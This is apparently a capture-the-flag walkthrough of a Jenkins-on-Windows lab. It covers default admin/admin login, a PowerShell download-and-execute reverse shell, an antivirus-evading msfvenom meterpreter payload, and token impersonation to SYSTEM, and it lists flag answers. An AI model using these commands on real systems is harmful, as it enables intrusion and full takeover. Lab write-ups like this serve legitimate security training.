Task 1 : Initial Access
In this room, we’ll learn how to exploit a common misconfiguration on a widely used automation server(Jenkins — This tool is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we’ll use an interesting privilege escalation method to get full system access.
Since this is a Windows application, we’ll be using Nishang to gain initial access. The repository contains a useful set of scripts for initial access, enumeration and privilege escalation. In this case, we’ll be using the reverse shell scripts
Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.
#1 How many ports are open? (TCP only)
We can see open ports 80, 3389 and 8080.
ans : 3
#2 What is the username and password for the log in panel(in the format username:password)
We can see open ports 80 and 8080. We have go to website.
and then we can control the 8080 port.
That’s awesome. We find jenkins login. We can research on the google that.
We can try default login, user and password. But it was incorrect.
We can try admin/admin.
That’s correct we are inside website.
We can use burp suite and hydra for admin/password. But this is default password not need this one.
ans : admin/admin
#3 Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it: powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port
You first need to download the Powershell script, and make it available for the server to download. You can do this by creating a http server with python: python3 -m http.server
We have to do what we’re asked to do upstairs.
#4 What is the user.txt flag?
We going to open ip:8080 and then open my project.
We can see that page.
We going to open configure.
apply and save.
And then click buld now.
Suscess! we are inside machine!
We can find user.txt
ans : 79007a09481963edf2e1321abd9ae2a0
Task 2 : Switching Shells
To make the privilege escalation easier, let’s switch to a meterpreter shell using the following process.
Use msfvenom to create the a windows meterpreter reverse shell using the following payload
msfvenom -p windows/meterpreter/reverse_tcp -a x86 — encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe
This payload generates an encoded x86–64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious.
After creating this payload, download it to the machine using the same method in the previous step:
powershell “(New-Object System.Net.WebClient).Downloadfile(‘http://<ip>:8000/shell-name.exe’,’shell-name.exe’)”
Before running this program, ensure the handler is set up in metasploit:
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run
This step uses the metasploit handler to receive the incoming connection from you reverse shell. Once this is running, enter this command to start the reverse shell
Start-Process “shell-name.exe”
This should spawn a meterpreter shell for you!
#1 What is the final size of the exe payload that you generated?
ans : 73803
But i will continue on exploit.
set lhost and lport.
you can use “exploit” or “run” commands.
We can create http server. We can use python3 -m http.server or SimpleHTTPserver.
This is powershell comand. It was given to us upstairs.
Success! We are inside machine.
Task 3 : Privilege Escalation
Now that we have initial access, let’s use token impersonation to gain system access.
Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).
This access token consists of:
user SIDs(security identifier)
group SIDs
privileges
amongst other things. More detailed information can be found here.
There are two types of access tokens:
primary access tokens: those associated with a user account that are generated on log on
impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
SecurityAnonymous: current user/client cannot impersonate another user/client
SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
SecurityDelegation: current user/client can impersonate the client’s security context on a remote system
where the security context is a data structure that contains users’ relevant security information.
The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:
SeImpersonatePrivilege
SeAssignPrimaryPrivilege
SeTcbPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeCreateTokenPrivilege
SeLoadDriverPrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
There’s more reading here.
#1 View all the privileges using whoami /priv
use whoami /priv.
We can see privileges information. “enable” is an important detail for us.
SeDebugPrivilege Debug programs Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
#2 You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability. Enter: load incognito to load the incognito module in metasploit. Please note, you may need to use the use incognito command if the previous command doesn’t work. Also ensure that your metasploit is up to date.
load incognito.
We can see incognito commads.
#3 To check which tokens are available, enter the list_tokens -g. We can see that the BUILTIN\Administrators token is available. Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token. What is the output when you run the getuid command?
We saw how to use it with the help command.
ans : NT AUTHORITY\SYSTEM
#4 Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
We find the root.
ans : dff0f748678f280250f25a45b8046b4a
This box was really fun! I love the ones that have a story/theme that goes along with them.
Hope you guys enjoyed this tutorial, let me know if you try this out. Follow me for more projects like this!
